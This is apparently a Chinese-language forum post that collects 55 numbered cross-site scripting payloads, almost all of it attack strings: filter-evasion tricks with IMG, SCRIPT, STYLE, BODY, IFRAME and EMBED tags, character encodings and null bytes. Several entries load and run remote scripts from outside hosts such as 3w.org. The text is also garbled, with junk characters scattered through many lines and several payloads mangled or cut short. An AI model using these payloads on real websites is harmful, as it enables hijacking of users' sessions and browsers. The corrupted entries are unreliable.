XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
' ~; [* V4 S. |( ?: u" O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99)另类弹框
! ]8 Z1 y4 I( M' Y) U3 O<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
- |$ |/ a& k( w$ B8 f <zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
& e) [1 F2 U" G6 K" m<a=">clickme</a>
<z=">clickme</z=">
# e* Y4 C/ n% L6 Q( J<z onclick=alert`1`>clickme</z>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
9 u5 Q6 U' Q+ S/ d1 b<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& c% p6 O. w% H6 x4 ~5 j
(5)HTML编码(必须有分号)
( m. C5 W3 y5 M( r# r<IMG SRC=javascript:alert(“XSS”)>
& a3 _! V$ j! a7 j
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, a' L/ H' j5 a1 ^1 ?! h. M
' g( u0 J* i% g  U- [0 F! n1 v0 r) x- b(8)UTF-8的Unicode编码(计算器)
; e6 _9 U3 h4 z6 p<IMG SRC=jav..省略..S')>
3 C' R5 q( X4 i) Z
' u# u+ d$ U! ~! o(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ w! p* {0 B4 A) f  x<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

; o* ]4 Y- c9 }: S+ C7 L' p(11)嵌入式标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

0 ]1 @. G( `  C" e( X(12)嵌入式编码标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ E0 w4 h; h. y( E+ O& c" Q. }
(13)嵌入式换行符
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# A* \8 W* G  \
9 ~7 P# N' e9 S! ~4 T& ?(14)嵌入式回车
0 a/ w, p* ~& g: N( p) j5 K<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! Y# j- \2 y+ G1 p6 I: W8 p) {<IMG SRC=\'#\'" /span>
' h4 b7 ^( ~8 `/ G$ c
(16)解决限制字符(要求同页面)
* g4 o1 O5 m% D, P7 A- Z, R3 t6 P<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
3 ~0 w2 `* t8 ~, Z1 V<script>z=z+’tp://ww’</script>
, Q0 i  D9 x+ W0 |2 W/ ]<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
2 G% ?* K" E! X3 J0 a* a  m<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
& I  j9 m; z: c$ D) _9 b
# [: Q+ e/ H" s2 Z* @7 a(17)空字符
! ?. N1 Z. I! operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* O  z9 [& D" p8 q2 a9 g+ A
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
- ^6 U$ m& T- s5 D# b' _+ X
+ y5 Z) G" P+ N(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
7 S9 [1 V) B9 k! h/ ]
(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" A, K# l; e- o! Z2 `$ q' w( o
(25)无结束脚本标记2
8 ]0 v3 W, u& l* _<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>
" T! k6 Y# W  U) k+ J2 N: y
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
1 f" M% ~% Q7 ~
(28)无单引号 双引号 分号
: D( M7 w& \9 A' }0 j( V$ I* W<SCRIPT>a=/XSS/
1 L; f. M1 z5 w) Q  p! ?alert(a.source)</SCRIPT>
6 D# t: o1 I* R* q9 W
(29)换码过滤的JavaScript
8 ^% s0 o/ l9 k; G( z' i' E\”;alert(‘XSS’);//
2 u$ v( L, k2 _- @& T, t: \- A. L7 M
(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- e+ l4 y1 x4 y" b% Z
9 z* D& w) d1 q: `7 W# p(31)Input Image
<INPUT SRC=\'#\'" /span>

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>
- Z5 S! ^( _& l. A; X, X2 v2 z
(34)IMG Dynsrc
& |' {5 `+ s5 o8 Y6 P+ n$ h<IMG DYNSRC=\'#\'" /span>

(35)IMG Lowsrc
! t& Y8 f& M% {# C$ r! M<IMG LOWSRC=\'#\'" /span>

3 D: J+ n" q& h8 M! e7 D(36)BGSOUND
<BGSOUND SRC=\'#\'" /span>
, y( k4 q( ~& Y7 r/ j2 D1 g' d
, G/ p) I$ D6 i9 |4 }; \(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
/ R- b! E+ `! H! Z' i6 c( V  t
(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
) W; F; G4 c8 ?9 H, b3 P  x+ L9 `
% X7 o' I1 ]# J4 ](39)List-style-image(列表式)
& h- z- g( K) `8 e4 u5 S<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

( ^$ K! A! H7 a, W! b2 A$ g(40)IMG VBscript
, F+ x2 d' O- L+ l  a: Y- G<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
. ~, K- l4 L$ t, w. U
(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ b8 b) T6 _9 o5 J
(42)Iframe
# N) s6 C+ \7 ^  a1 r- m<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
( }1 i0 r. n( D) S5 w<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

( j9 ?1 P; B) f; S1 \* S; M( t(44)Table
( b3 N6 a% |0 m% a3 R" ^<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 e" z/ K7 ]( b6 g" D) j
(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

5 Z. _6 b8 q9 L: V) o* d2 S* |(46)DIV background-image
8 b( q* j7 c& g5 w<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

! i) ]. ^2 ~9 \$ }! d+ S8 Z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
* X- [. o( }! n. t3 E<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>
% ]6 p) ?: k. Q; d
(48)DIV expression
: ~7 \' w- G2 {  M0 i# G<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达
( N  U# Q# y) \6 H2 N<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! F- V1 i5 x4 D0 k: m* `' f- G$ S
; p$ `4 u( _, ~- a  @(50)匿名STYLE(组成:开角号和一个字母开头)
) M- r# ^* G! x" g6 ^* Z<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- J- x8 W, }7 f8 H$ Q
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' T2 l9 N$ v7 K# m7 N6 p1 b
(52)IMG STYLE方式
3 D' S& A9 o) r: Z. Mexppression(alert(“XSS”))’>
% H, n# Z5 n* m1 P& e% a
(53)STYLE background
0 N, U  }  B* g8 G& N5 u<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

( u3 O' N0 u8 `- U6 V7 n(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 n8 D3 |! v7 [0 q( v<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
9 r# g% ], [1 n. W+ a